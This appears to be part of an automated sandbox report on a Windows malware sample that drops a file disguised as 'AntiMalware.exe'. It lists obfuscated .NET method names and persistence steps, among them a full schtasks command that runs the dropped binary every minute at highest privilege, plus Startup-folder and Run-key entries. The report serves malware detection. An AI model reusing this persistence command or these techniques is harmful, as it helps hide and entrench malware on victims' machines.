                    Source: KJhsNv2RcI.exe, 9Q6wo5GIJslY0EUF0BReShiW8VCd5eFOmAFvbKomXlHNaUeGITKUIybv.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_7mGtIaNE3ZfIhsxCTYEiCXCUO5ehsa0zv5IIDcNQE41LghRghKDRT14HBdmO0CFPDzlrJZ2K80bg1s6oAAa2JdLlVJo', '_8miEQH0XAp33Zq86cIu0FCW3on10rTD79BS2VXYueWjkDxFOf885IS31UNOjGC1TTCpuTGW75a15zWx6J91z7bMrSUv', '_8zy5pvWIhV0JknAs0u1AMvmxDeExfn3j2qS3bkoEkVMUkjKJ8AtKJZb2S5ivFO6j7OxqqcXtkJn1MvUgUXR8wiJrks6', 'qvLOfRPfUICeZ4y0iX5IJ9vw48RmGlBZocOFXuR4d9vgRsSSUaU8hgx4EcWle6YcfPhbgbApeJ7UTyrMCwnFtQhlq1N'
                    Source: KJhsNv2RcI.exe, bc5d5KxBYG8BSnDb99wxd6G2hCSIQCyI5Pzhb6cYv.csHigh entropy of concatenated method names: 'rK6wUjfVr6B091oRa9cqm5VCVJibt9InzChMTz3Mg', 'fBBeRTVmZdkXaZ3DZtnjowZJQc8BJUCWNpjM4jrGB', '_7i5BcVseQZ7XfRQHqGNHJx4M9XkfrBPcBvZXWyxzX', '_26L9AhSA1zbA1iR3JaFKHoYlDXtmIzBNz4OacxINc', 'Xtr5eyMV3bTVypINtEzN60VYG8kWXsDJJ51YlCXUw', 'uax91fkjoZmVc1Jd6hYerpgW99yZE1EN5fkhkqCkA', '_1vhFBJDeU6RSc6MV0hWWWCQK8bjdW1MmGnj0if7IB', 'r3QasISCv0YLqsdO9cXTnBLu0AqjWCTbZUqOXCa7i', 'ZCHM2VuaL9OGwAE9QmHmkPk2NiQKy5xryAnTLXoCCS7ue0zYzFn2W8Csd1L60dLMPyi4ZmJs1', 'rynk8Q6Q80c58bYpmrVgBjZ6uTY0zRFZUFHyuyf8MNZFx9OvNOj8K2afSguadxiBIcFaQT1MT'
                    Source: KJhsNv2RcI.exe, RUCExmlMu1zB0zWUH2dod7WYL85BhzE1Muvrm7cVSAVT2TTMf9mZWKcxVrH32JJlFMXHGMnyn.csHigh entropy of concatenated method names: 'rAdHqplo0aJ9ECm645w4J4w3beMdieaURmbhI82bDFpGbX9GK8gMMeRdAut4BmqcBwyZtmlPP', '_1q90FTwmTMsqGbm828Aod252YbcRAVU7e', '_4LY9UfG9S7JCA42F6hEirBkmYhAaXX35F', 'IzoQXe93AjRuuc4FQYuy9i8w1MGsAIPee', 'kWLqZ4vLNGJkxQBdjGXTkGOIGVj91e2qn'
                    Source: KJhsNv2RcI.exe, feKXYab47fChB1t3yM9LI6D4Lfs1KJgg7SBp6HFHY.csHigh entropy of concatenated method names: 'Q5sgmLnWNlgdsgUUIM9TZJhXsWvw6nwHCXKvMdIdN', '_6iQfpAtYQkFpXxHBAffrmhmxqHVKMwjUcuev8SPJJ', 'b5HzCNlssrAYZGRW0ZnVa6YrzuguustihSKtdqkD2', 'aoCpepQRzZ6PXTQq21kJJ6Nb4GJjK1VAVX1GVBG96', 'hw4FTvh4nmakzrW95OVTf59DtKq7VlMShWC9IFToF', 'KbuODyByHaAkaHlVlSosuwrdX91IiprChtXnB76It', 'gtFsZqRDOSaCMYeKi4KRTX1TjAL0Rvdg8e2w1VkJ7', 'wKdY2UhVpEjJ6AfWSGYyQPv2wPJWCVyVTk6j8X5jk', 'xBTJhs1gXGKYbLZwemWznY66o4Pky98Q9CQrDCX3L', 'VXRFmUv5MrynUyFbjZFlcCaskamO2kFBi9nI2Z5qG'
                    Source: KJhsNv2RcI.exe, 3asxm3zE8WKKq2mCowDWRa7Zqz1J1LgSLQIXjaZNMoAoiqanhL6gYsxdxef7cVWjbb5h6vA1M.csHigh entropy of concatenated method names: 'bwHJCZmQxmiPcDZhDim6R8VB8YsdBPTCkBKONdHoCcrGm8m86ojER14az37iLMUc9Ik4m418A', 'orh65mGrnpjlnV9pDHJ9zKzI1iH1GhFQipaRdLJGolDBFmyvT56RYvII3U6w9F0BTYt20pVPK', 'io40E635ANBptjPoZ3ketSk2gnNPp0w1FpkVXBVmzkajr8EWBeYnINndG6DRlSfExUYh4bbVb', 'EHWDVizcMnUBZoJmB2tO8l9R1NH7ua5riHw2pEJMbIZVOavKnOlpnhwvMLm3A8JxwZZwfNT62', 'U8azAKf2eSwMRoui7kh3nkITmQelGoU7ePZ89PXGnL1lLgOtE7dBtVzfDsXTdrrGXelXksMNf', 'iHduHQo0ObsjvehQiyY6LHD6jkM52urjpEEZMc9mX3WgQfoeFhwhmAxQ8reBR05HMF0zKBkEW', '_7cXlDnXmY85HJgyzBsVCoVJDKxmEH79cICDrrRolGURZb22xrJ8C5DvbJ2HAmBWDVDRvKWePd', 'eGMQ4q7q9Ubyeq8Y3F8ov9VxVcl6lpHb0Wg0xGLAo9EHYqba0ITFbNL8o9JUhAR88mbOnBVuk', 'qTw9qQ5xic51hPhA4J2RUGmGbiA2OF6JvPuwmWE7mh45kSxS8zsUhU5X5K62FfF5hOJdigFUj', 'TQODDSMxwDXVkIzWJgNxeJcNhpIqbDw4pezmjaetInViMPFVKCKkrNNiou87jlD8XZFDtsIUh'
                    Source: KJhsNv2RcI.exe, 5RA0MlVhan9LHUx22KtiZHofgfMG8kXn9ITEJjhDO0HyBg9ltaTDANiTB3QyWTxbE6gwQxSwX.csHigh entropy of concatenated method names: 'vkhEGguF1c9KGCSHrW8vE3BqUQRbz3VIfa2wrwGaNxaGr6DgQ19ike2RTSbrCuRZ55RKK1qUT', 'uCQAna7jwsjJXk8DA5AzeCf4YzUlnAWmcIWsTRRceNK1yvZAkQfX4zflSMwkbbY7eXI29IMTv', '_0fOn2AL11pKb2xVYFpR7tpFPryR0cygaC9zvGad4qd76wYj6CA5Pdz5FYRW9Ab6AWy3mz8CR4', 'EkZD6wO5PViINwAE2mu63j7PJNEUaHVLqQpGO0fBztTcUxaerFLXVBERBCstAGHWFHeuwQiHg', 'wi6twx4Y2YpWIbvvnsoIgPVFGUpg5WIuA', 'raSwi9R0GT8EcBieugat2vcAqbhVh96EV', '_5x7biC4ALRGqBjwHWqngOYSZtPINYPHjx', 'Zl2A4yfUb4IGFE39Zsggv5ogyYFZuWHb2', 'JiNYjo69sH5jdwQKB3wZbBzto3qp0uL4Z', 'iPDLcXnku6fxRQUTrxdlW9ZqX6tZfZddd'
                    Source: KJhsNv2RcI.exe, brAnaade4ccS3WwSHgoibHVsyYy3mKAzEe8IUtBwSivJXoFqHhZcpmOu553Ff3jbmYuMJ6WHV.csHigh entropy of concatenated method names: 'Ew0BRYLuiSXSuHWviKhhLBVuC6TzG1cyxs7ypYhkywVN9dwRH5ynOth0ytUsMrtiRGwJE4hLZ', 'Z3tmonuWUjHvf9IfMNTQF4lf9uqnBGJP2', 'MwA7IuR7NK28bHWFFIj0qgpJptoPmVL1L', 'AxOoxUBaWB603y0WlCku7O3RIbjgIgPDI', 'natKkdiH39kYQHWvAKZsH5gDHT1OrncWy'
                    Source: KJhsNv2RcI.exe, rkmpG9lVmPQQFajrrVTlntvIty7v6DlhHQmw9zJCJ.csHigh entropy of concatenated method names: 'nwja47JFwoDCoAMU2SXGSQzryhGp0fkjzm8MoXjMU', 'plF5NHizGHOq71xQ51AZHWdFdotAyXwWYb8cwCLjF', 'A3PJk14KqhOz4VSb3TgxLYwkV0WOQzTtB9yY9zl0J', 'VADmEhg64MjjCkscrIOo2eLsv8YgB9ZPiP233vWUa', '_4Qthis3hicxqEzQP3FUwbWeS2i5F3n8XTHRs0eP1N', 'ivWAAyJL0CFPy3yyJSikX0VFAUu3tidt4a3YYHYnT', 'zSsRYw1iBWoYiHJ5M2qKXIsbA3IhXE1EDPBbbXHfG', 'wsYVkn4y0D4ZyNtuDkxiPucJJ2UoDc7Gl7seAX34h', '_9gFzMPpMXnXc5eY5axR6P9E2qvR0saH9GQBESuYHZ', 'NpF692QxsPQ2mXuNun8NtyU4b0AKkwOpjvRJGt3Cd'
                    Source: AntiMalware.exe.0.dr, 2BC6Xw66CdnFwScFoVzJShUMBfhP1HR28CAnuVnGn.csHigh entropy of concatenated method names: 'e3OgAFGQz6Vmh2IHd8IjYfJA8fM8Pe2rH49f5Oq2gQhubly3QaZcKgujadTXC8I3u6hO4GWK3Bwb2oWT1NQXtSpSvIm', 'piA5RRwB8UUUsqDGoFFSSbsQcze4Ews8fxAL7zFjxOJqSLz44Ny8sTthzOlNC7ApppXl2w3vgv01ZbUHAIq9Sl2FcUy', 'rKJKN0I39uqEZJkTms6Ra3yUDR3KEGQciRg4eVSy9LKBh5YwyBA236cK9ra2HDpgL4NG8G8FKD37n0t4j966QJ75ouM', 'fxwKJFZB4wkaIZ2oDfkojqwMp71WxO3Bky0zwBcwPJ3I24KjGleFrp6k2sqDBmqduI5KpLSLCLu5OSJ2JZDrTdf4Nar'
                    Source: AntiMalware.exe.0.dr, RCxBoCbPSSvzWYE9.csHigh entropy of concatenated method names: 'TQo4fYtsohOoQC3w', 'hOjjqRC7CF2a1ps1', 'HH6vf3IviJ2J2WMr', '_86yCrhuIzBcVOQ4zd2Wt2piGnlpFvvw3HqW805VIKm0uWtuGW3u9rRznzkvDXd8iUF', 'vv6P2iPZPpXCrISBjFZOgI6c9PtYaxoe1mIetXhBpR1S7l5MNnMtyvIuA1oIBytefw', '_41Ps0Ao2dkOGdjnsUmjRlZOjJoCX0iGIqluQLKn9WO7BzWZPEI2Z8TKS5mjsJuwiqD', 'A59uWJhU3BAFC7ai5AU9JECv4rGNO4pFNIUMysefERanGjn5fhPl4nmIHj7bfI8Kyh', 'g3xbKhCIsQXNMLJEw4Jnnq5t9Q9oMPKgAlGV0HrbP3yVlKPssvXjtV6Qac42Pb7mUQ', 'LVC85HLl0hYhPFBDqkrxDvaA3cHIC7aiBv0LXOVNfNvnP8VvlFgTHD1iZgAfVGrmj1', 'uivYvaDVjD5FdkNWIXUpHEuttARJOxyJahKbJwlkiVu9zRrU3BHt5wi3WcJ8uISfWE'
                    Source: AntiMalware.exe.0.dr, 9Q6wo5GIJslY0EUF0BReShiW8VCd5eFOmAFvbKomXlHNaUeGITKUIybv.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_7mGtIaNE3ZfIhsxCTYEiCXCUO5ehsa0zv5IIDcNQE41LghRghKDRT14HBdmO0CFPDzlrJZ2K80bg1s6oAAa2JdLlVJo', '_8miEQH0XAp33Zq86cIu0FCW3on10rTD79BS2VXYueWjkDxFOf885IS31UNOjGC1TTCpuTGW75a15zWx6J91z7bMrSUv', '_8zy5pvWIhV0JknAs0u1AMvmxDeExfn3j2qS3bkoEkVMUkjKJ8AtKJZb2S5ivFO6j7OxqqcXtkJn1MvUgUXR8wiJrks6', 'qvLOfRPfUICeZ4y0iX5IJ9vw48RmGlBZocOFXuR4d9vgRsSSUaU8hgx4EcWle6YcfPhbgbApeJ7UTyrMCwnFtQhlq1N'
                    Source: AntiMalware.exe.0.dr, bc5d5KxBYG8BSnDb99wxd6G2hCSIQCyI5Pzhb6cYv.csHigh entropy of concatenated method names: 'rK6wUjfVr6B091oRa9cqm5VCVJibt9InzChMTz3Mg', 'fBBeRTVmZdkXaZ3DZtnjowZJQc8BJUCWNpjM4jrGB', '_7i5BcVseQZ7XfRQHqGNHJx4M9XkfrBPcBvZXWyxzX', '_26L9AhSA1zbA1iR3JaFKHoYlDXtmIzBNz4OacxINc', 'Xtr5eyMV3bTVypINtEzN60VYG8kWXsDJJ51YlCXUw', 'uax91fkjoZmVc1Jd6hYerpgW99yZE1EN5fkhkqCkA', '_1vhFBJDeU6RSc6MV0hWWWCQK8bjdW1MmGnj0if7IB', 'r3QasISCv0YLqsdO9cXTnBLu0AqjWCTbZUqOXCa7i', 'ZCHM2VuaL9OGwAE9QmHmkPk2NiQKy5xryAnTLXoCCS7ue0zYzFn2W8Csd1L60dLMPyi4ZmJs1', 'rynk8Q6Q80c58bYpmrVgBjZ6uTY0zRFZUFHyuyf8MNZFx9OvNOj8K2afSguadxiBIcFaQT1MT'
                    Source: AntiMalware.exe.0.dr, RUCExmlMu1zB0zWUH2dod7WYL85BhzE1Muvrm7cVSAVT2TTMf9mZWKcxVrH32JJlFMXHGMnyn.csHigh entropy of concatenated method names: 'rAdHqplo0aJ9ECm645w4J4w3beMdieaURmbhI82bDFpGbX9GK8gMMeRdAut4BmqcBwyZtmlPP', '_1q90FTwmTMsqGbm828Aod252YbcRAVU7e', '_4LY9UfG9S7JCA42F6hEirBkmYhAaXX35F', 'IzoQXe93AjRuuc4FQYuy9i8w1MGsAIPee', 'kWLqZ4vLNGJkxQBdjGXTkGOIGVj91e2qn'
                    Source: AntiMalware.exe.0.dr, feKXYab47fChB1t3yM9LI6D4Lfs1KJgg7SBp6HFHY.csHigh entropy of concatenated method names: 'Q5sgmLnWNlgdsgUUIM9TZJhXsWvw6nwHCXKvMdIdN', '_6iQfpAtYQkFpXxHBAffrmhmxqHVKMwjUcuev8SPJJ', 'b5HzCNlssrAYZGRW0ZnVa6YrzuguustihSKtdqkD2', 'aoCpepQRzZ6PXTQq21kJJ6Nb4GJjK1VAVX1GVBG96', 'hw4FTvh4nmakzrW95OVTf59DtKq7VlMShWC9IFToF', 'KbuODyByHaAkaHlVlSosuwrdX91IiprChtXnB76It', 'gtFsZqRDOSaCMYeKi4KRTX1TjAL0Rvdg8e2w1VkJ7', 'wKdY2UhVpEjJ6AfWSGYyQPv2wPJWCVyVTk6j8X5jk', 'xBTJhs1gXGKYbLZwemWznY66o4Pky98Q9CQrDCX3L', 'VXRFmUv5MrynUyFbjZFlcCaskamO2kFBi9nI2Z5qG'
                    Source: AntiMalware.exe.0.dr, 3asxm3zE8WKKq2mCowDWRa7Zqz1J1LgSLQIXjaZNMoAoiqanhL6gYsxdxef7cVWjbb5h6vA1M.csHigh entropy of concatenated method names: 'bwHJCZmQxmiPcDZhDim6R8VB8YsdBPTCkBKONdHoCcrGm8m86ojER14az37iLMUc9Ik4m418A', 'orh65mGrnpjlnV9pDHJ9zKzI1iH1GhFQipaRdLJGolDBFmyvT56RYvII3U6w9F0BTYt20pVPK', 'io40E635ANBptjPoZ3ketSk2gnNPp0w1FpkVXBVmzkajr8EWBeYnINndG6DRlSfExUYh4bbVb', 'EHWDVizcMnUBZoJmB2tO8l9R1NH7ua5riHw2pEJMbIZVOavKnOlpnhwvMLm3A8JxwZZwfNT62', 'U8azAKf2eSwMRoui7kh3nkITmQelGoU7ePZ89PXGnL1lLgOtE7dBtVzfDsXTdrrGXelXksMNf', 'iHduHQo0ObsjvehQiyY6LHD6jkM52urjpEEZMc9mX3WgQfoeFhwhmAxQ8reBR05HMF0zKBkEW', '_7cXlDnXmY85HJgyzBsVCoVJDKxmEH79cICDrrRolGURZb22xrJ8C5DvbJ2HAmBWDVDRvKWePd', 'eGMQ4q7q9Ubyeq8Y3F8ov9VxVcl6lpHb0Wg0xGLAo9EHYqba0ITFbNL8o9JUhAR88mbOnBVuk', 'qTw9qQ5xic51hPhA4J2RUGmGbiA2OF6JvPuwmWE7mh45kSxS8zsUhU5X5K62FfF5hOJdigFUj', 'TQODDSMxwDXVkIzWJgNxeJcNhpIqbDw4pezmjaetInViMPFVKCKkrNNiou87jlD8XZFDtsIUh'
                    Source: AntiMalware.exe.0.dr, 5RA0MlVhan9LHUx22KtiZHofgfMG8kXn9ITEJjhDO0HyBg9ltaTDANiTB3QyWTxbE6gwQxSwX.csHigh entropy of concatenated method names: 'vkhEGguF1c9KGCSHrW8vE3BqUQRbz3VIfa2wrwGaNxaGr6DgQ19ike2RTSbrCuRZ55RKK1qUT', 'uCQAna7jwsjJXk8DA5AzeCf4YzUlnAWmcIWsTRRceNK1yvZAkQfX4zflSMwkbbY7eXI29IMTv', '_0fOn2AL11pKb2xVYFpR7tpFPryR0cygaC9zvGad4qd76wYj6CA5Pdz5FYRW9Ab6AWy3mz8CR4', 'EkZD6wO5PViINwAE2mu63j7PJNEUaHVLqQpGO0fBztTcUxaerFLXVBERBCstAGHWFHeuwQiHg', 'wi6twx4Y2YpWIbvvnsoIgPVFGUpg5WIuA', 'raSwi9R0GT8EcBieugat2vcAqbhVh96EV', '_5x7biC4ALRGqBjwHWqngOYSZtPINYPHjx', 'Zl2A4yfUb4IGFE39Zsggv5ogyYFZuWHb2', 'JiNYjo69sH5jdwQKB3wZbBzto3qp0uL4Z', 'iPDLcXnku6fxRQUTrxdlW9ZqX6tZfZddd'
                    Source: AntiMalware.exe.0.dr, brAnaade4ccS3WwSHgoibHVsyYy3mKAzEe8IUtBwSivJXoFqHhZcpmOu553Ff3jbmYuMJ6WHV.csHigh entropy of concatenated method names: 'Ew0BRYLuiSXSuHWviKhhLBVuC6TzG1cyxs7ypYhkywVN9dwRH5ynOth0ytUsMrtiRGwJE4hLZ', 'Z3tmonuWUjHvf9IfMNTQF4lf9uqnBGJP2', 'MwA7IuR7NK28bHWFFIj0qgpJptoPmVL1L', 'AxOoxUBaWB603y0WlCku7O3RIbjgIgPDI', 'natKkdiH39kYQHWvAKZsH5gDHT1OrncWy'
                    Source: AntiMalware.exe.0.dr, rkmpG9lVmPQQFajrrVTlntvIty7v6DlhHQmw9zJCJ.csHigh entropy of concatenated method names: 'nwja47JFwoDCoAMU2SXGSQzryhGp0fkjzm8MoXjMU', 'plF5NHizGHOq71xQ51AZHWdFdotAyXwWYb8cwCLjF', 'A3PJk14KqhOz4VSb3TgxLYwkV0WOQzTtB9yY9zl0J', 'VADmEhg64MjjCkscrIOo2eLsv8YgB9ZPiP233vWUa', '_4Qthis3hicxqEzQP3FUwbWeS2i5F3n8XTHRs0eP1N', 'ivWAAyJL0CFPy3yyJSikX0VFAUu3tidt4a3YYHYnT', 'zSsRYw1iBWoYiHJ5M2qKXIsbA3IhXE1EDPBbbXHfG', 'wsYVkn4y0D4ZyNtuDkxiPucJJ2UoDc7Gl7seAX34h', '_9gFzMPpMXnXc5eY5axR6P9E2qvR0saH9GQBESuYHZ', 'NpF692QxsPQ2mXuNun8NtyU4b0AKkwOpjvRJGt3Cd'
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeFile created: C:\Users\user\AppData\Roaming\AntiMalware.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AntiMalware" /tr "C:\Users\user\AppData\Roaming\AntiMalware.exe"
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AntiMalware.lnkJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AntiMalware.lnkJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AntiMalwareJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AntiMalwareJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\FD8F82E7B686FB3F64B2 018E06F57725563E4525700EDFFAFB1B062BF5D4B0E9FEE498507F0F8200FCDFJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
